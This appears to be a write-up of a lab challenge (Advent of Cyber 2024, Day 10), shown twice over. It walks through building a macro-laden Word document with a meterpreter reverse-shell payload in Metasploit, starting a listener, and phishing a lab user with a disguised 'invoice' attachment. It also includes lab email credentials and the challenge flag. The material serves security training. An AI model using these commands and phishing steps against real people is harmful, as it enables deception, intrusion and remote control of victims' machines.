Day 10

He had a brain full of macros, and had shells in his soul.

Last updated 4 months ago

Was this helpful?

Day 10

He had a brain full of macros, and had shells in his soul.

Welcome to Day 10 of Advent of Cyber 2024!

Today, we take on the role of the notorious Mayor Malware to explore the art of creating and deploying malicious documents. In this challenge, we’ll craft a macro-enabled Word document using Metasploit, set up a reverse shell listener, and retrieve the hidden flag by exploiting a target system.

Macro is a script embedded in a document or application, typically used to automate repetitive tasks. In the context of cybersecurity, attackers often exploit macros by embedding malicious code in documents (e.g., Word or Excel) to execute commands or deliver payloads when the victim opens the file. This makes macros a common vector in phishing and malware attacks.

Lets begin;

Start the machine and wait for it to deploy.

We use Metasploit to create the document.

Start Metasploit:

msfconsole

Configure the Payload and Exploit Module:

set payload windows/meterpreter/reverse_tcp
use exploit/multi/fileformat/office_word_macro
set LHOST CONNECTION_IP
set LPORT 8888
show options
exploit

LHOST should be set to the IP of the AttackBox.

This will create a macro-enabled document msf.docm and stored in /root/.msf4/local/msf.docm.

Preparing the Listener

The listener is set up to receive connections when the victim opens the malicious document.

Start Metasploit Again:

msfconsole

Configure the Handler:

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST CONNECTION_IP
set LPORT 8888
show options
exploit

LHOST should be set to the IP of the AttackBox.

This will create a listener and waits for incoming connections.

Now we need to sent the malicious document :

Compose an email to the target user, marta@socmas.thm

Log in to the Email Server:
- URL: http://10.10.251.173
- Email: info@socnas.thm
- Password: MerryPhishMas!
Compose the Email:
- Attach msf.docm (rename it to something convincing like invoice.docm).
- Write a convincing message to make the victim to open the document.
When the victim (Marta) opens the doc, the macro will get executed and we will get a connection to our machine.

Questions:

1.What is the flag value inside the flag.txt file that’s located on the Administrator’s desktop?

A: THM{PHISHING_CHRISTMAS}

Stay tuned for Day 11, and happy hacking! 🎄

Thank you!

PreviousDay 8 NextDay 15

Last updated 4 months ago

Was this helpful?

Welcome to Day 10 of Advent of Cyber 2024!

Macro is a script embedded in a document or application, typically used to automate repetitive tasks. In the context of cybersecurity, attackers often exploit macros by embedding malicious code in documents (e.g., Word or Excel) to execute commands or deliver payloads when the victim opens the file. This makes macros a common vector in phishing and malware attacks.

Lets begin;

Start the machine and wait for it to deploy.

We use Metasploit to create the document.

Start Metasploit:

msfconsole

Configure the Payload and Exploit Module:

set payload windows/meterpreter/reverse_tcp
use exploit/multi/fileformat/office_word_macro
set LHOST CONNECTION_IP
set LPORT 8888
show options
exploit

LHOST should be set to the IP of the AttackBox.

This will create a macro-enabled document msf.docm and stored in /root/.msf4/local/msf.docm.

Preparing the Listener

The listener is set up to receive connections when the victim opens the malicious document.

Start Metasploit Again:

msfconsole

Configure the Handler:

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST CONNECTION_IP
set LPORT 8888
show options
exploit

LHOST should be set to the IP of the AttackBox.

This will create a listener and waits for incoming connections.

Now we need to sent the malicious document :

Compose an email to the target user, marta@socmas.thm

Log in to the Email Server:
- URL: http://10.10.251.173
- Email: info@socnas.thm
- Password: MerryPhishMas!
Compose the Email:
- Attach msf.docm (rename it to something convincing like invoice.docm).
- Write a convincing message to make the victim to open the document.
When the victim (Marta) opens the doc, the macro will get executed and we will get a connection to our machine.

Questions:

1.What is the flag value inside the flag.txt file that’s located on the Administrator’s desktop?

A: THM{PHISHING_CHRISTMAS}

Stay tuned for Day 11, and happy hacking! 🎄

Thank you!